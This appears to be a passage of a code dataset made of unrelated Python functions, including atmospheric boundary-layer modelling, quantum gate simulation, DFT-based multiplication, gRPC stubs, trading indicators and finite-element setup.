pass\n else : \n x = Fdf.constant(x)\n return x", "def run_main(sst, ft_qv, use_NT):\n\n dtout=10. #minutes\n end_time=8*24. #hours\n del_time=dtout*60. #seconds\n end_time=end_time*3600. #seconds\n #sst=297\n D=5.e-6 #s-1\n U=7 #m/s\n psfc=100. #kPa\n qsfc=tf.qs_tp(sst,psfc)\n ft_intercept = 292 #K\n ft_gamma = 6.e-3 #K/m\n #ft_qv = 2.e-3\n k=0.2 #entrainment efficiency\n Cd = 1.e-3 #drag coefficient\n tspan = np.arange(0.,end_time,del_time)\n vars_init=[285.,400.,8.e-3] #theta (K), height (m) qv (kg/kg) to start\n the_tup=dict(D=D,U=U,sst=sst,ft_intercept=ft_intercept,ft_gamma=ft_gamma,\n qsfc=qsfc,ft_qv=ft_qv,k=k,Cd=Cd,radcool=30.,use_NT=use_NT) # include use_NT\n the_tup=make_tuple(the_tup,'coeffs')\n output=integrate.odeint(dmixed_vars, vars_init, tspan,(the_tup,))\n result=pd.DataFrame.from_records(output,columns=['theta','h','qv'])\n\n # save time/computation by only doing calculations for the last timestep (equilibrium)\n result['time']=tspan[-1]/3600./24. #days\n result['deltheta'] = theta_ft(result['h'].values[-1],ft_intercept,ft_gamma) - result['theta'].iloc[-1]\n result['delqv'] = ft_qv - result['qv'].iloc[-1]\n result['LCL'] = calc_lcl(result.iloc[-1], psfc)\n result['q_flux_0']=calc_sfc_qvap_flux(result.iloc[-1],the_tup)\n result['T_flux_0']=calc_sfc_theta_flux(result.iloc[-1],the_tup)\n result['entflux_theta']=calc_entflux_theta(result.iloc[-1],the_tup)\n \n # decide how to calculate entrainment\n the_vars = [result['theta'].iloc[-1],result['h'].iloc[-1],result['qv'].iloc[-1]]\n if use_NT:\n result['went']=calc_went_NT(the_vars, the_tup, result['deltheta'].iloc[-1], \n result['T_flux_0'].iloc[-1], result['q_flux_0'].iloc[-1])\n else:\n result['went']=calc_went(result.iloc[-1],the_tup)\n\n result['entflux_qv']=calc_entflux_qv(result.iloc[-1],the_tup)\n\n with open('dumpmodel.csv','w') as f:\n result.to_csv(f,index=False)\n \n return None", "def __init__(self, *args):\n _ITKCostFunctionsPython.itkSingleValuedVnlCostFunctionAdaptor_swiginit(self,_ITKCostFunctionsPython.new_itkSingleValuedVnlCostFunctionAdaptor(*args))", "def DFTmultiply(x, y, DFTfn, IDFTfn, stringsReversed=False):\n \n # 1. Convert decimal strings to lists of digits, pad with zeros so that length\n # is a power of 2\n N_1 = len(x)\n N_2 = len(y)\n p = math.log(N_1 + N_2, 2)\n N = 2**math.ceil(p)\n \n if stringsReversed:\n x_seq = [int(d) for d in x] + [0]*(N - N_1) \n y_seq = [int(d) for d in y] + [0]*(N - N_2)\n else:\n x_seq = [int(d) for d in x[::-1]] + [0]*(N - N_1) \n y_seq = [int(d) for d in y[::-1]] + [0]*(N - N_2)\n \n # 2. Compute DFT of sequences and multiply them elementwise\n X = DFTfn([Complex(d, 0) for d in x_seq])\n Y = DFTfn([Complex(d, 0) for d in y_seq])\n C = [a*b for a,b in zip(X,Y)]\n \n # 3. Compute inverse DFT to get coefficients of product polynomial\n c = IDFTfn(C)\n c_seq = [round(s.re) for s in c]\n \n # 4. Do carry operation and return cleaned decimal string\n carry = 0\n c_seq_carry = []\n for digit in c_seq:\n s = digit + carry\n new_digit, carry = s % 10, s//10\n c_seq_carry.append(new_digit)\n \n r = ''.join([str(d) for d in c_seq_carry])\n r = r.rstrip('0')[::-1]\n return r", "def calc_qcorr(self) -> Dict[int, float]:\n return self._calc_qcorr", "def simulate_quantities_of_interest_superoperator(tlist, c_ops, noise_parameters_CZ, fluxlutman,\n fluxbias_q1, amp,\n sim_step,\n verbose: bool=True):\n\n H_0=calc_hamiltonian(0,fluxlutman,noise_parameters_CZ) # computed at 0 amplitude\n # NOTE: parameters of H_0 could be not exactly e.g. the bare frequencies\n\n # We change the basis from the standard basis to the basis of eigenvectors of H_0\n # The columns of S are the eigenvectors of H_0, appropriately ordered\n if noise_parameters_CZ.dressed_compsub():\n S = qtp.Qobj(matrix_change_of_variables(H_0),dims=[[3, 3], [3, 3]])\n else:\n S = qtp.tensor(qtp.qeye(3),qtp.qeye(3)) # line here to quickly switch off the use of S\n H_0_diag = S.dag()*H_0*S\n\n #w_q0 = fluxlutman.q_freq_01()\n w_q0 = (H_0_diag[1,1]-H_0_diag[0,0]) / (2*np.pi)\n #w_q1 = fluxlutman.q_freq_10()\n w_q1 = (H_0_diag[3,3]-H_0_diag[0,0]) / (2*np.pi)\n\n # H_rotateaway = coupled_transmons_hamiltonian_new(w_q0=w_q0, w_q1=w_q1, \n # alpha_q0=-2*w_q0, alpha_q1=-2*w_q1, J=0)\n\n w_q1_sweetspot = noise_parameters_CZ.w_q1_sweetspot()\n # Correction up to second order of the frequency due to flux noise, computed from w_q0(phi) = w_q0^sweetspot * sqrt(cos(pi * phi/phi_0))\n w_q1_biased = w_q1 - np.pi/2 * (w_q1_sweetspot**2/w_q1) * np.sqrt(1 - (w_q1**4/w_q1_sweetspot**4)) * fluxbias_q1 - \\\n - np.pi**2/2 * w_q1_sweetspot * (1+(w_q1**4/w_q1_sweetspot**4)) / (w_q1/w_q1_sweetspot)**3 * fluxbias_q1**2\n # with sigma up to circa 1e-3 \\mu\\Phi_0 the second order is irrelevant\n correction_to_H = coupled_transmons_hamiltonian_new(w_q0=0, w_q1=np.real(w_q1_biased-w_q1), alpha_q0=0, alpha_q1=0, J=0)\n\n\n t0 = time.time()\n\n exp_L_total=1\n for i in range(len(amp)):\n H=calc_hamiltonian(amp[i],fluxlutman,noise_parameters_CZ) + correction_to_H\n H=S.dag()*H*S\n if c_ops != []:\n c_ops_temp=[]\n for c in range(len(c_ops)):\n if isinstance(c_ops[c],list):\n c_ops_temp.append(c_ops[c][0]*c_ops[c][1][i]) # c_ops are already in the H_0 basis\n else:\n c_ops_temp.append(c_ops[c])\n liouville_exp_t=(qtp.liouvillian(H,c_ops_temp)*sim_step).expm()\n else:\n liouville_exp_t=(-1j*H*sim_step).expm()\n exp_L_total=liouville_exp_t*exp_L_total\n\n t1 = time.time()\n #print('\\n alternative propagator',t1-t0)\n\n\n U_final = exp_L_total\n #U_final=rotating_frame_transformation_new(U_final, fluxlutman.cz_length(), H_0_diag)\n\n phases = phases_from_superoperator(U_final) # order is phi_00, phi_01, phi_10, phi_11, phi_02, phi_20, phi_cond\n phi_cond = phases[-1]\n L1 = leakage_from_superoperator(U_final)\n population_02_state = calc_population_02_state(U_final)\n L2 = seepage_from_superoperator(U_final)\n avgatefid = pro_avfid_superoperator_phasecorrected(U_final,phases)\n avgatefid_compsubspace = pro_avfid_superoperator_compsubspace_phasecorrected(U_final,L1,phases) # leakage has to be taken into account, see Woods & Gambetta\n #print('avgatefid_compsubspace',avgatefid_compsubspace)\n\n \n \n #H_twoqubits = coupled_transmons_hamiltonian_new(w_q0=w_q0, w_q1=w_q1, \n # alpha_q0=-2*w_q0, alpha_q1=-2*w_q1, J=0)\n #U_final_new = rotating_frame_transformation_new(U_final, fluxlutman.cz_length(), H_twoqubits) ### old method rotating away also the phase of the |2> state\n\n t = tlist[-1]+sim_step\n U_final_new = correct_reference(U=U_final,w_q1=w_q1,w_q0=w_q0,t=t)\n\n ### Script to check that we are correctly removing the single qubit phases in the rotating frame\n # cz_length = fluxlutman.cz_length()\n # U_check = (1j*H_twoqubits*cz_length).expm() * (-1j*H_0_diag*cz_length).expm()\n # phases_check = phases_from_superoperator(U_check)\n # print(phases_check)\n\n \n avgatefid_compsubspace_notphasecorrected = pro_avfid_superoperator_compsubspace(U_final_new,L1)\n # NOTE: a single qubit phase off by 30 degrees costs 5.5% fidelity\n\n ### Script to check that leakage and phi_cond are not affected by the phase correction, as it should be\n # L1_bis = leakage_from_superoperator(U_final_new)\n # phi_cond_bis = phases_from_superoperator(U_final_new)[-1]\n # print('leakage',L1-L1_bis)\n # print('phi_cond',phi_cond-phi_cond_bis)\n\n phases = phases_from_superoperator(U_final_new) # order is phi_00, phi_01, phi_10, phi_11, phi_02, phi_20, phi_cond\n phase_q0 = (phases[1]-phases[0]) % 360\n phase_q1 = (phases[2]-phases[0]) % 360\n\n\n # We now correct only for the phase of qubit left (q1), in the rotating frame\n avgatefid_compsubspace_pc_onlystaticqubit = pro_avfid_superoperator_compsubspace_phasecorrected_onlystaticqubit(U_final_new,L1,phases)\n \n\n return {'phi_cond': phi_cond, 'L1': L1, 'L2': L2, 'avgatefid_pc': avgatefid,\n 'avgatefid_compsubspace_pc': avgatefid_compsubspace, 'phase_q0': phase_q0, 'phase_q1': phase_q1,\n 'avgatefid_compsubspace': avgatefid_compsubspace_notphasecorrected,\n 'avgatefid_compsubspace_pc_onlystaticqubit': avgatefid_compsubspace_pc_onlystaticqubit, 'population_02_state': population_02_state,\n 'U_final_new': U_final_new}", "def make_derivate_fn(self):\n\n def derivative_fn(y, t):\n self.time = t\n self.compartments = self.convert_list_to_compartments(y)\n self.prepare_vars_and_flows()\n flow_vector = self.convert_compartments_to_list(self.flows)\n self.checks()\n return flow_vector\n\n return derivative_fn", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_H2 = self.edp_par['rho_H2'].value\n Z_H2 = self.edp_par['Z_H2'].value\n sigma_H2 = self.edp_par['sigma_H2'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n \n # Make sure Z_H2 > Z_H1. If Z_H2 < Z_H1, swap them\n if Z_H1 > Z_H2:\n Z_H1, Z_H2 = Z_H2, Z_H1\n sigma_H1, sigma_H2 = sigma_H2, sigma_H1\n rho_H1, rho_H2 = rho_H2, rho_H1\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H2 + sigma_H2\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG += 2*rho_H2*sigma_H2 * cos(alpha*Z_H2) * exp(-0.5*(alpha*sigma_H2)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def beta_create_Core_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('org.axe.platform.dapi.v0.Core', 'broadcastTransaction'): BroadcastTransactionRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'getBlock'): GetBlockRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'getEstimatedTransactionFee'): GetEstimatedTransactionFeeRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'getStatus'): GetStatusRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'getTransaction'): GetTransactionRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'subscribeToBlockHeadersWithChainLocks'): BlockHeadersWithChainLocksRequest.SerializeToString,\n ('org.axe.platform.dapi.v0.Core', 'subscribeToTransactionsWithProofs'): TransactionsWithProofsRequest.SerializeToString,\n }\n response_deserializers = {\n ('org.axe.platform.dapi.v0.Core', 'broadcastTransaction'): BroadcastTransactionResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'getBlock'): GetBlockResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'getEstimatedTransactionFee'): GetEstimatedTransactionFeeResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'getStatus'): GetStatusResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'getTransaction'): GetTransactionResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'subscribeToBlockHeadersWithChainLocks'): BlockHeadersWithChainLocksResponse.FromString,\n ('org.axe.platform.dapi.v0.Core', 'subscribeToTransactionsWithProofs'): TransactionsWithProofsResponse.FromString,\n }\n cardinalities = {\n 'broadcastTransaction': cardinality.Cardinality.UNARY_UNARY,\n 'getBlock': cardinality.Cardinality.UNARY_UNARY,\n 'getEstimatedTransactionFee': cardinality.Cardinality.UNARY_UNARY,\n 'getStatus': cardinality.Cardinality.UNARY_UNARY,\n 'getTransaction': cardinality.Cardinality.UNARY_UNARY,\n 'subscribeToBlockHeadersWithChainLocks': cardinality.Cardinality.UNARY_STREAM,\n 'subscribeToTransactionsWithProofs': cardinality.Cardinality.UNARY_STREAM,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'org.axe.platform.dapi.v0.Core', cardinalities, options=stub_options)", "def WeibullAcq(params, dt, t, q = 0, cov_mkt = None, seed=None, log_alpha = False)->AcquisitionFunction:\n #print(params)\n par_pop = params[0,0]\n par_pop.astype(float)\n par_lambda = params[0,1] \n par_lambda.astype(float)\n par_c = params[0,2] \n par_c.astype(float)\n #par_r = params[0,3] \n #par_r.astype(float)\n par_beta_q = params[0,3] \n par_beta_q.astype(float)\n par_beta_mkt = params[0,4] \n par_beta_mkt.astype(float)\n \n if log_alpha:\n par_lambda = np.exp(par_lambda)\n #print(par_pop)\n \n q = np.array(q).astype(int)\n \n if cov_mkt is None:\n cov_mkt = np.ones_like(t)\n cov_mkt.astype(float)\n \n #cov_mkt_hf = np.array([0.018171081,0.036342162,0.054513243,0.072684324,0.090855405,0.109026486,0.127197568,0.145368649,0.16353973,0.181710811,0.199881892,0.218052973,0.236224054,0.254395135,0.272566216,0.290737297,0.308908378,0.327079459,0.345250541,0.363421622,0.381592703,0.399763784,0.417934865,0.436105946,0.627393493,0.81868104,1.009968586,1.201256133,1.39254368,1.583831227,1.775118773,1.96640632,2.157693867,2.348981414,2.54026896,2.731556507,3.645778254,4.56,5.474221746,6.112110873,6.75,7.387889127,8.808944563,10.23,11.65105544,13.13112772,14.6112,16.09127228,14.28563614,12.48,10.67436386,11.17218193,11.67,12.16781807,12.06890904,11.97,11.87109096,11.48764548,11.1042,10.72075452,15.05037726,19.38,23.70962274,20.62981137,17.55,14.47018863]) \n # qrt to assign quartly covariate\n \n idx = np.arange(t.size)\n\n mnth = np.mod(idx,12)+1\n qrt = np.floor_divide((mnth-1), 3)+1\n \n qrt_bool = (qrt<=np.max(q)) * (qrt>=np.min(q))\n idd_q = np.argwhere(qrt_bool)\n idd_nq = np.argwhere(np.logical_not(qrt_bool))\n \n cov_q = np.zeros_like(cov_mkt)\n\n cov_q[idd_q] = np.exp(par_beta_mkt*np.log(cov_mkt[idd_q])+par_beta_q)\n \n cov_q[idd_nq] = np.exp(par_beta_mkt*np.log(cov_mkt[idd_nq]))\n \n noise = 0.0\n \n tstep = float(dt)\n\n if seed is not None:\n rng = np.random.RandomState(seed=seed)\n else:\n rng = np.random.RandomState()\n\n ####################################\n # kinetics\n \n x = t\n\n ####################################\n # simulation from initial point\n \n #print(cov_q)\n b = np.copy(cov_q)\n idx = idx + 1\n \n ### Check indexing (cov is +1)\n for i in range(1,b.size):\n b[i] = b[i-1] + (idx[i]**par_c-idx[i-1]**par_c)*cov_q[i]\n \n \n V = (1.0-par_pop)*(1-np.exp(- par_lambda * b))\n V0 = V[0]\n V[1:]=V[1:]-V[0:(V.size-1)]\n V[0] = V0\n\n return np.array(V).reshape(-1, 1)", "def technical_analysis(df, periods=ta_periods, macd_periods=periods_MACD):\n\n original_join_state = SETTINGS.join\n SETTINGS.join = False\n\n if 'Volume' not in df.columns and cols_in_df(df, ['Vol']) != []:\n df['Volume'] = df['Volume (BTC)'] # some TA functions need a 'Volume' column\n\n if cols_in_df(df, ['Vol']) != []:\n result = pd.concat([compute_function_different_periods(df, periods, ta.ATR),\n compute_function_different_periods(df, periods, pta.BBANDS),\n compute_function_different_periods(df, periods, pta.STO),\n compute_function_different_periods(df, periods, pta.TRIX),\n # Vortex is a FUCKIN SHIT that gives randomly high values. Fuck it\n # compute_function_different_periods(df, [period for period in periods if period > 6], pta.Vortex),\n compute_function_different_periods(df, periods, pta.RSI),\n # compute_function_different_periods(df, periods, pta.ACCDIST),\n compute_function_different_periods(df, periods, pta.MFI),\n compute_function_different_periods(df, periods, pta.OBV),\n compute_function_different_periods(df, periods, pta.FORCE),\n # compute_function_different_periods(df, periods, pta.EOM),\n compute_function_different_periods(df, periods, pta.CCI),\n compute_function_different_periods(df, periods, pta.COPP),\n compute_function_different_periods(df, periods, pta.KELCH),\n compute_function_different_periods(df, periods, pta.STDDEV),\n compute_function_different_periods(df, periods, pta.MA),\n compute_function_different_periods(df, periods, ta.MMed),\n compute_function_different_periods(df, periods, pta.EMA),\n # compute_function_different_periods(df, periods, pta.MOM),\n # compute_function_different_periods(df,periods, pta.ROC),\n # compute_function_different_periods(df, ROC, log=True),\n # pta.MACD(df, 10, 30),\n\n compute_MACD_different_periods(df, periods=macd_periods)\n # pta.PPSR(df)\n ], axis=1)\n\n else:\n result = pd.concat([compute_function_different_periods(df, periods, ta.ATR),\n compute_function_different_periods(df, periods, pta.BBANDS),\n compute_function_different_periods(df, periods, pta.STO),\n compute_function_different_periods(df, periods, pta.TRIX),\n compute_function_different_periods(df, periods, pta.RSI),\n compute_function_different_periods(df, periods, pta.CCI),\n compute_function_different_periods(df, periods, pta.COPP),\n compute_function_different_periods(df, periods, pta.KELCH),\n compute_function_different_periods(df, periods, pta.STDDEV),\n compute_function_different_periods(df, periods, pta.MA),\n compute_function_different_periods(df, periods, ta.MMed),\n compute_function_different_periods(df, periods, pta.EMA),\n compute_MACD_different_periods(df, periods=macd_periods)\n ], axis=1)\n\n\n # result = result.fillna(method='pad')\n SETTINGS.join = original_join_state\n return out(SETTINGS, df, result)", "def corr(self):\n pass", "def derivatives(self, increment_filter):\n ######################################################################\n # derivatives fluid and mass balance are static\n k = self.num_nw_fluids * 2 + 2\n\n ######################################################################\n # derivatives for energy balance equation\n for i in range(2):\n self.jacobian[k, i, 0] = (\n self.outl[i].h.val_SI - self.inl[i].h.val_SI)\n self.jacobian[k, i, 2] = -self.inl[i].m.val_SI\n\n self.jacobian[k, 2, 2] = self.inl[0].m.val_SI\n self.jacobian[k, 3, 2] = self.inl[1].m.val_SI\n k += 1\n\n ######################################################################\n # derivatives for specified heat transfer\n if self.Q.is_set:\n self.jacobian[k, 0, 0] = (\n self.outl[0].h.val_SI - self.inl[0].h.val_SI)\n self.jacobian[k, 0, 2] = -self.inl[0].m.val_SI\n self.jacobian[k, 2, 2] = self.inl[0].m.val_SI\n k += 1\n\n ######################################################################\n # derivatives for specified heat transfer coefficient\n if self.kA.is_set:\n f = self.kA_func\n self.jacobian[k, 0, 0] = (\n self.outl[0].h.val_SI - self.inl[0].h.val_SI)\n for i in range(4):\n if not increment_filter[i, 1]:\n self.jacobian[k, i, 1] = self.numeric_deriv(f, 'p', i)\n if not increment_filter[i, 2]:\n self.jacobian[k, i, 2] = self.numeric_deriv(f, 'h', i)\n k += 1\n\n ######################################################################\n # derivatives for specified heat transfer coefficient\n if self.kA_char.is_set:\n f = self.kA_char_func\n if not increment_filter[0, 0]:\n self.jacobian[k, 0, 0] = self.numeric_deriv(f, 'm', 0)\n if not increment_filter[1, 0]:\n self.jacobian[k, 1, 0] = self.numeric_deriv(f, 'm', 1)\n for i in range(4):\n if not increment_filter[i, 1]:\n self.jacobian[k, i, 1] = self.numeric_deriv(f, 'p', i)\n if not increment_filter[i, 2]:\n self.jacobian[k, i, 2] = self.numeric_deriv(f, 'h', i)\n k += 1\n\n ######################################################################\n # derivatives for specified upper terminal temperature difference\n if self.ttd_u.is_set:\n f = self.ttd_u_func\n for i in [0, 3]:\n if not increment_filter[i, 1]:\n self.jacobian[k, i, 1] = self.numeric_deriv(f, 'p', i)\n if not increment_filter[i, 2]:\n self.jacobian[k, i, 2] = self.numeric_deriv(f, 'h', i)\n k += 1\n\n ######################################################################\n # derivatives for specified lower terminal temperature difference\n if self.ttd_l.is_set:\n f = self.ttd_l_func\n for i in [1, 2]:\n if not increment_filter[i, 1]:\n self.jacobian[k, i, 1] = self.numeric_deriv(f, 'p', i)\n if not increment_filter[i, 2]:\n self.jacobian[k, i, 2] = self.numeric_deriv(f, 'h', i)\n k += 1\n\n ######################################################################\n # derivatives for specified pressure ratio at hot side\n if self.pr1.is_set:\n self.jacobian[k, 0, 1] = self.pr1.val\n self.jacobian[k, 2, 1] = -1\n k += 1\n\n ######################################################################\n # derivatives for specified pressure ratio at cold side\n if self.pr2.is_set:\n self.jacobian[k, 1, 1] = self.pr2.val\n self.jacobian[k, 3, 1] = -1\n k += 1\n\n ######################################################################\n # derivatives for specified zeta at hot side\n if self.zeta1.is_set:\n f = self.zeta_func\n if not increment_filter[0, 0]:\n self.jacobian[k, 0, 0] = self.numeric_deriv(\n f, 'm', 0, zeta='zeta1', inconn=0, outconn=0)\n if not increment_filter[0, 1]:\n self.jacobian[k, 0, 1] = self.numeric_deriv(\n f, 'p', 0, zeta='zeta1', inconn=0, outconn=0)\n if not increment_filter[0, 2]:\n self.jacobian[k, 0, 2] = self.numeric_deriv(\n f, 'h', 0, zeta='zeta1', inconn=0, outconn=0)\n if not increment_filter[2, 1]:\n self.jacobian[k, 2, 1] = self.numeric_deriv(\n f, 'p', 2, zeta='zeta1', inconn=0, outconn=0)\n if not increment_filter[2, 2]:\n self.jacobian[k, 2, 2] = self.numeric_deriv(\n f, 'h', 2, zeta='zeta1', inconn=0, outconn=0)\n k += 1\n\n ######################################################################\n # derivatives for specified zeta at cold side\n if self.zeta2.is_set:\n f = self.zeta_func\n if not increment_filter[1, 0]:\n self.jacobian[k, 1, 0] = self.numeric_deriv(\n f, 'm', 1, zeta='zeta2', inconn=1, outconn=1)\n if not increment_filter[1, 1]:\n self.jacobian[k, 1, 1] = self.numeric_deriv(\n f, 'p', 1, zeta='zeta2', inconn=1, outconn=1)\n if not increment_filter[1, 2]:\n self.jacobian[k, 1, 2] = self.numeric_deriv(\n f, 'h', 1, zeta='zeta2', inconn=1, outconn=1)\n if not increment_filter[3, 1]:\n self.jacobian[k, 3, 1] = self.numeric_deriv(\n f, 'p', 3, zeta='zeta2', inconn=1, outconn=1)\n if not increment_filter[3, 2]:\n self.jacobian[k, 3, 2] = self.numeric_deriv(\n f, 'h', 3, zeta='zeta2', inconn=1, outconn=1)\n k += 1\n\n ######################################################################\n # derivatives for additional equations\n self.additional_derivatives(increment_filter, k)", "def __init__(self,\n uDict,\n phiDict,\n testSpaceDict,\n matType,\n dofBoundaryConditionsDict,\n dofBoundaryConditionsSetterDict,\n coefficients,\n elementQuadrature,\n elementBoundaryQuadrature,\n fluxBoundaryConditionsDict=None,\n advectiveFluxBoundaryConditionsSetterDict=None,\n diffusiveFluxBoundaryConditionsSetterDictDict=None,\n stressTraceBoundaryConditionsSetterDict=None,\n stabilization=None,\n shockCapturing=None,\n conservativeFluxDict=None,\n numericalFluxType=None,\n TimeIntegrationClass=None,\n massLumping=False,\n reactionLumping=False,\n options=None,\n name='defaultName',\n reuse_trial_and_test_quadrature=True,\n sd = True,\n movingDomain=False):\n #\n #set the objects describing the method and boundary conditions\n #\n self.movingDomain=movingDomain\n self.tLast_mesh=None\n #\n self.name=name\n self.sd=sd\n self.Hess=False\n self.lowmem=True\n self.timeTerm=True#allow turning off the time derivative\n #self.lowmem=False\n self.testIsTrial=True\n self.phiTrialIsTrial=True\n self.u = uDict\n self.ua = {}#analytical solutions\n self.phi = phiDict\n self.dphi={}\n for ck,phi in phiDict.iteritems():\n if coefficients.potential.has_key(ck):\n for cj in coefficients.potential[ck].keys():\n self.dphi[(ck,cj)] = FiniteElementFunction(phi.femSpace)\n else:\n self.dphi[(ck,ck)] = FiniteElementFunction(phi.femSpace)\n #check for nonlinearities in the diffusion coefficient that don't match the potential\n for ci,ckDict in coefficients.diffusion.iteritems():\n #for ck,cjDict in coefficients.diffusion.iteritems(): #cek: bug?\n for ck,cjDict in ckDict.iteritems():\n for cj in cjDict.keys():\n if not self.dphi.has_key((ck,cj)):\n self.dphi[(ck,cj)] = FiniteElementFunction(phi.femSpace)\n self.matType = matType\n #try to reuse test and trial information across components if spaces are the same\n self.reuse_test_trial_quadrature = reuse_trial_and_test_quadrature#True#False\n if self.reuse_test_trial_quadrature:\n for ci in range(1,coefficients.nc):\n assert self.u[ci].femSpace.__class__.__name__ == self.u[0].femSpace.__class__.__name__, \"to reuse_test_trial_quad all femSpaces must be the same!\"\n ## Simplicial Mesh\n self.mesh = self.u[0].femSpace.mesh #assume the same mesh for all components for now\n self.testSpace = testSpaceDict\n self.dirichletConditions = dofBoundaryConditionsDict\n self.dirichletNodeSetList=None #explicit Dirichlet conditions for now, no Dirichlet BC constraints\n self.coefficients = coefficients\n self.coefficients.initializeMesh(self.mesh)\n self.nc = self.coefficients.nc\n self.stabilization = stabilization\n self.shockCapturing = shockCapturing\n self.conservativeFlux = conservativeFluxDict #no velocity post-processing for now\n self.fluxBoundaryConditions=fluxBoundaryConditionsDict\n self.advectiveFluxBoundaryConditionsSetterDict=advectiveFluxBoundaryConditionsSetterDict\n self.diffusiveFluxBoundaryConditionsSetterDictDict = diffusiveFluxBoundaryConditionsSetterDictDict\n #determine whether the stabilization term is nonlinear\n self.stabilizationIsNonlinear = False\n #cek come back\n if self.stabilization != None:\n for ci in range(self.nc):\n if coefficients.mass.has_key(ci):\n for flag in coefficients.mass[ci].values():\n if flag == 'nonlinear':\n self.stabilizationIsNonlinear=True\n if coefficients.advection.has_key(ci):\n for flag in coefficients.advection[ci].values():\n if flag == 'nonlinear':\n self.stabilizationIsNonlinear=True\n if coefficients.diffusion.has_key(ci):\n for diffusionDict in coefficients.diffusion[ci].values():\n for flag in diffusionDict.values():\n if flag != 'constant':\n self.stabilizationIsNonlinear=True\n if coefficients.potential.has_key(ci):\n for flag in coefficients.potential[ci].values():\n if flag == 'nonlinear':\n self.stabilizationIsNonlinear=True\n if coefficients.reaction.has_key(ci):\n for flag in coefficients.reaction[ci].values():\n if flag == 'nonlinear':\n self.stabilizationIsNonlinear=True\n if coefficients.hamiltonian.has_key(ci):\n for flag in coefficients.hamiltonian[ci].values():\n if flag == 'nonlinear':\n self.stabilizationIsNonlinear=True\n #determine if we need element boundary storage\n self.elementBoundaryIntegrals = {}\n for ci in range(self.nc):\n self.elementBoundaryIntegrals[ci] = ((self.conservativeFlux != None) or\n (numericalFluxType != None) or\n (self.fluxBoundaryConditions[ci] == 'outFlow') or\n (self.fluxBoundaryConditions[ci] == 'mixedFlow') or\n (self.fluxBoundaryConditions[ci] == 'setFlow'))\n #\n #calculate some dimensions\n #\n self.nSpace_global = self.u[0].femSpace.nSpace_global #assume same space dim for all variables\n self.nDOF_trial_element = [u_j.femSpace.max_nDOF_element for u_j in self.u.values()]\n self.nDOF_phi_trial_element = [phi_k.femSpace.max_nDOF_element for phi_k in self.phi.values()]\n self.n_phi_ip_element = [phi_k.femSpace.referenceFiniteElement.interpolationConditions.nQuadraturePoints for phi_k in self.phi.values()]\n self.nDOF_test_element = [femSpace.max_nDOF_element for femSpace in self.testSpace.values()]\n self.nFreeDOF_global = [dc.nFreeDOF_global for dc in self.dirichletConditions.values()]\n self.nVDOF_element = sum(self.nDOF_trial_element)\n self.nFreeVDOF_global = sum(self.nFreeDOF_global)\n #\n NonlinearEquation.__init__(self,self.nFreeVDOF_global)\n #\n #build the quadrature point dictionaries from the input (this\n #is just for convenience so that the input doesn't have to be\n #complete)\n #\n elementQuadratureDict={}\n elemQuadIsDict = isinstance(elementQuadrature,dict)\n if elemQuadIsDict: #set terms manually\n for I in self.coefficients.elementIntegralKeys:\n if elementQuadrature.has_key(I):\n elementQuadratureDict[I] = elementQuadrature[I]\n else:\n elementQuadratureDict[I] = elementQuadrature['default']\n else:\n for I in self.coefficients.elementIntegralKeys:\n elementQuadratureDict[I] = elementQuadrature\n if self.stabilization != None:\n for I in self.coefficients.elementIntegralKeys:\n if elemQuadIsDict:\n if elementQuadrature.has_key(I):\n elementQuadratureDict[('stab',)+I[1:]] = elementQuadrature[I]\n else:\n elementQuadratureDict[('stab',)+I[1:]] = elementQuadrature['default']\n else:\n elementQuadratureDict[('stab',)+I[1:]] = elementQuadrature\n if self.shockCapturing != None:\n for ci in self.shockCapturing.components:\n if elemQuadIsDict:\n if elementQuadrature.has_key(('numDiff',ci,ci)):\n elementQuadratureDict[('numDiff',ci,ci)] = elementQuadrature[('numDiff',ci,ci)]\n else:\n elementQuadratureDict[('numDiff',ci,ci)] = elementQuadrature['default']\n else:\n elementQuadratureDict[('numDiff',ci,ci)] = elementQuadrature\n if massLumping:\n for ci in self.coefficients.mass.keys():\n elementQuadratureDict[('m',ci)] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global,1)\n for I in self.coefficients.elementIntegralKeys:\n elementQuadratureDict[('stab',)+I[1:]] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global,1)\n if reactionLumping:\n for ci in self.coefficients.mass.keys():\n elementQuadratureDict[('r',ci)] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global,1)\n for I in self.coefficients.elementIntegralKeys:\n elementQuadratureDict[('stab',)+I[1:]] = 